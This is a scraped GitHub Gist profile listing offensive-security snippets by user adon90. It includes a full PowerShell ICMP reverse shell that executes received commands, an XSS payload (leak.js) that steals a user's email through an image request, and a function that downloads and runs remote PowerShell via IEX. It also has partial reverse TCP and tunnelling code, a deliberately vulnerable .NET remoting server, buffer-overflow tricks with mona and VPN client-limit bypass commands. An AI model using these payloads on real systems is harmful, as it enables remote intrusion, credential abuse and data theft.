Skip to content

Instantly share code, notes, and snippets.

aDoN adon90

  • Spain
Block or report user

Report or block adon90

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
powershell -nop -Command "$IP = '';$client = New-Object System.Net.NetworkInformation.Ping;$options = New-Object System.Net.NetworkInformation.PingOptions;$options.DontFragment = $true;$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes('pie'), $options);while($true){$comms = $client.Send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes(''), $options);if($comms.Buffer){ $cmd = ([Text.Encoding]::ASCII).GetString($comms.Buffer);$reply = (Invoke-Expression -Command $cmd | Out-String);$client.send($IP, 1000, ([Text.Encoding]::ASCII).GetBytes($reply), $options);}}"
adon90 / leak.js
Created Oct 9, 2019
Perfect XSS Extraction + Information Leak
View leak.js
var req = new XMLHttpRequest();
req.onload = function () {
var patt2 = /OA_mail":\["([^"]*?)"/g;
var result = patt2.exec(req.responseText)[1];
new Image().src = (""+result);
};"GET", "/api/dataUsers/v1/WebStore/getUser", true);
adon90 /
Last active Sep 19, 2019
reGeorg with Cookie
# 保存为 ,然后 -u -p 8080 -s "PHPSESSIONID: xxxxxxxxxxxxxxxxxx"
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
import argparse
import signal
import sys
import atexit
View VulnerableDotNetHTTPRemoting.cs
using System;
using System.Collections;
using System.Runtime.Remoting;
using System.Runtime.Remoting.Channels;
using System.Runtime.Remoting.Channels.Http;
using System.Runtime.Serialization.Formatters;
namespace ExampleRemoting
public class DateTimeServer : MarshalByRefObject, IDisposable
View Frida
import sys
import pefile
import frida
def on_message(message, data):
print "[%s] -> %s" % (message, data)
View ReverseC#TCP
Add-Type -TypeDefinition @"
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.Net.Sockets;
public class ReverseTCP
View powershell_api.txt
Add-Type -TypeDefinition @"
using System;
using System.Diagnostics;
using System.Runtime.InteropServices;
public static class GetAddress
[DllImport("kernel32", SetLastError=true, CharSet = CharSet.Ansi)]
adon90 / exploiting.txt
Last active Aug 1, 2018
Exploiting Tricks
View exploiting.txt
Mona tricks:
!mona pc 1000 -> Launch exploit with pattern
!mona findmsp -> autocalculate offset, ESP size.....
No jmp esp in Exec Region (.text) but no DEP:
!mona asm -s "jmp esp"
!mona find -s "\xff\xe4" -m <module>
View runas-cabesha-webdelivery
function runas-cabesha-webdelivery {param ($url,$user,$pass)
$username = $user
$password = $pass
$securePassword = ConvertTo-SecureString $password -AsPlainText -Force
$credenciales = New-Object System.Management.Automation.PSCredential $username, $securePassword
Start-Job -ArgumentList $url,$credenciales -ScriptBlock {param ($url,$credenciales)
$O=new-object net.webclient;$O.proxy=[Net.WebRequest]::GetSystemWebProxy();$O.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($O.downloadstring("$URL"))
} -Credential $credenciales | Wait-Job | Receive-Job
adon90 / bypassvpn.txt
Last active Jul 10, 2018
Bypass VPN Number of Clients
View bypassvpn.txt
openvpn adon901.ovpn
sshuttle -vr root@HOST
sshuttle -vr root@HOST
socat TCP4-LISTEN:8443,fork,reuseaddr TCP4:<COMPUTER1>:80
You can’t perform that action at this time.